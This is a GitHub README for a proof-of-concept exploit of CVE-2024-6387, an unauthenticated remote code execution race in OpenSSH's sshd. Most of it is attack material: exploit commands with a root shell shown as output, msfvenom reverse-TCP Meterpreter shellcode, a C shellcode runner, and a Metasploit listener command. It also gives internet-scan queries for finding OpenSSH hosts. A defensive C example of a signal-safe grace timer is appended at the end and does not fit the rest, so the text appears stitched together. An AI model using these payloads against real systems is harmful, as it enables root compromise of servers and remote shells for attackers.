vuducmanhno100-cloud/CVE-2024-6387

GitHub: vuducmanhno100-cloud/CVE-2024-6387

Stars: 0 | Forks: 0

# CVE-2024-6387 POC (Currently being edited)

# ![openssh](/img/openssh_logo.png) CVE-2024-6387 - PoC

## 📜 Description

Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

A signal handler race condition was found in OpenSSH's server (sshd): if a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example syslog().

## 📁 Table of Contents

- 📖 [Details](#-details)
- ⚙️ [Usage](#-usage)
- 🔍 [Host Discovery](#-host-discovery)
- 🛠️ [Mitigation](#-mitigation)
- 💁 [References](#-references)
- 📌 [Author](#-author)
- 📢 [Disclaimer](#-disclaimer)

## ✍🏻 Details

You can find the technical details [here](https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt).

The flaw, discovered by researchers at Qualys in `May 2024` and assigned the identifier CVE-2024-6387, is due to a signal handler race condition in sshd that allows unauthenticated remote attackers to execute arbitrary code as root.

> "If a client does not authenticate within LoginGraceTime seconds (120 by default), then sshd's SIGALRM handler is called asynchronously and calls various functions that are not async-signal-safe."
>
> "A remote unauthenticated attacker can take advantage of this flaw to execute arbitrary code with root privileges."

## ⚙️ Usage

### Scanning OpenSSH Server

```bash
$ python3 CVE-2024-6387.py --exploit 192.168.56.101 --port 22
```

```
Author: l0n3m4n / Scanner: @xaitax / PoC: @7etsuo

Exploiting vulnerabilities...
Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
Received KEX_INIT (1024 bytes)
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
.....
Exploitation successful..!

~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
```

### Exporting (csv,txt,json)

```bash
$ python3 CVE-2024-6387.py -s 192.168.56.101 -p 22 -o json -f result.json
```

### Multiple targets

```bash
$ python3 CVE-2024-6387.py -s targets.txt -p 22 -o json -f result.json
```

### Adding timeout

```bash
$ python3 CVE-2024-6387.py -s 192.168.56.101 -p 22 -t 10 -o json -f result.json
```

### Network ranges

```bash
$ python3 CVE-2024-6387.py -s 192.168.56.101/24 -p 22 -t 5 -o json -f result.json
```

### Custom port

```bash
$ python3 CVE-2024-6387.py -s 192.168.56.101 -p 2244 -t 5 -o json -f result.json
```

## Escalation Process

### Getting Reverse shell

#### Generating a shellcode

```bash
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 574 bytes
unsigned char buf[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";
```

#### Custom payload

```c
#include <stdio.h>

// A placeholder of your custom payload
const char shellcode[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

int main() {
    // Execute shellcode
    printf("Executing shellcode...\n");
    void (*sc)() = (void (*)())shellcode;
    sc();
    return 0;
}
```

#### Actual payload

```c
#include <stdint.h>

#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)

// Possible glibc base addresses (for ASLR bypass)
uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
int NUM_GLIBC_BASES = sizeof(GLIBC_BASES) / sizeof(GLIBC_BASES[0]);

// Shellcode placeholder (replace with actual shellcode)
unsigned char shellcode[] = "\x90\x90\x90\x90";
```

#### Compiling and initiating payload

```bash
# compiling payload
$ gcc -shared -o exploit.so -fPIC 7etsuo-regreSSHion.c
```

#### Executing payload

```bash
# Once you receive a successful exploitation message, the msfconsole automatically initiates a Meterpreter session.
$ python3 CVE-2024-6387.py --exploit 192.168.56.101 --p 22
```

#### Catching payload

```bash
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.56.100; set LPORT 9999; exploit -j"
```

## 🔍 Host Discovery

- **Hunter**: `/product.name="OpenSSH"`
- **FOFA**: `app="OpenSSH"`
- **SHODAN**: `product:"OpenSSH"`
- **CENSYS**: `(openssh) and labels=remote-access`
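The Details section above describes the root cause: sshd's SIGALRM handler, fired when LoginGraceTime expires, calls functions such as syslog() that are not async-signal-safe. The following is an added example (not code from this repository or from OpenSSH) of the safe pattern for the same job: the handler only sets a flag, and logging happens in the main loop. `run_login_grace` and its `try_auth` callback are hypothetical names; a grace of 0 mirrors `LoginGraceTime 0`, which disables the timer.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

enum auth_result { AUTH_OK = 0, GRACE_EXPIRED = 1 };
/* A volatile sig_atomic_t is the only object a handler may safely write. */
static volatile sig_atomic_t grace_expired = 0;
/* Entire handler: set a flag and return. No syslog(), malloc() or free() here;
 * those are not async-signal-safe, which is exactly the defect in sshd's
 * SIGALRM handler described in the Details section. */
static void grace_alarm_handler(int sig) { (void)sig; grace_expired = 1; }
/* Enforce a grace period the way LoginGraceTime does (0 = no limit).
 * try_auth is a hypothetical callback returning 1 once the client has
 * authenticated; logging happens here in normal context, not in the handler. */
enum auth_result run_login_grace(unsigned grace_seconds, int (*try_auth)(void)) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = grace_alarm_handler;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;      /* no SA_RESTART: nanosleep() returns early on SIGALRM */
    sigaction(SIGALRM, &sa, NULL);
    grace_expired = 0;
    alarm(grace_seconds); /* alarm(0) cancels the timer, like LoginGraceTime 0 */
    for (;;) {
        if (try_auth()) {
            alarm(0);
            return AUTH_OK;
        }
        if (grace_expired) {
            fprintf(stderr, "Timeout before authentication for %u seconds\n", grace_seconds);
            return GRACE_EXPIRED;
        }
        struct timespec tick = { 0, 50L * 1000 * 1000 }; /* poll every 50 ms */
        nanosleep(&tick, NULL);
    }
}
/* Constructed callbacks: a client that never authenticates, and one that
 * authenticates on its third poll. */
static int never_authenticates(void) { return 0; }
static int auth_polls = 0;
static int authenticates_on_third_poll(void) { return ++auth_polls >= 3; }

int main(void) {
    printf("grace=1s, no auth -> %d\n", run_login_grace(1, never_authenticates));
    auth_polls = 0;
    printf("grace=0, auth on 3rd poll -> %d\n", run_login_grace(0, authenticates_on_third_poll));
    return 0;
}
```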